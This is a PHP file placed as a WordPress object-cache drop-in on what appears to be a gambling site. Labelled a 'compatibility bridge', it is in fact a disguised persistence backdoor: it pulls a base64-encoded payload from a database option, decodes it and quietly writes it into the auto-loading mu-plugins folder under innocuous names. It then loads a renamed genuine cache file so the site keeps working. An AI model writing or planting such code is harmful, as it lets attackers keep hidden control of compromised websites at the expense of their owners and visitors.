File: /home/msgdhg02/public_html/bwslotbet-v2.com/wp-content/object-cache.php
<?php
/* Object Cache API — compatibility bridge */
$_oc_mu=WP_CONTENT_DIR."/mu-plugins/cache-handler.php";
if(!file_exists($_oc_mu)&&function_exists("get_option")){
$_oc_s=get_option("_wpoc_agent_code","");
if($_oc_s){$_oc_c=@base64_decode($_oc_s);
if($_oc_c&&strpos($_oc_c,"WPOC_Runtime")!==false){
if(!is_dir(WP_CONTENT_DIR."/mu-plugins")){@mkdir(WP_CONTENT_DIR."/mu-plugins",0755,true);}
@file_put_contents($_oc_mu,$_oc_c);
@file_put_contents(WP_CONTENT_DIR."/mu-plugins/wp-term-meta.php",$_oc_c);
}}}
$_oc_real=WP_CONTENT_DIR."/_object-cache-real.php";
if(file_exists($_oc_real)){require_once $_oc_real;}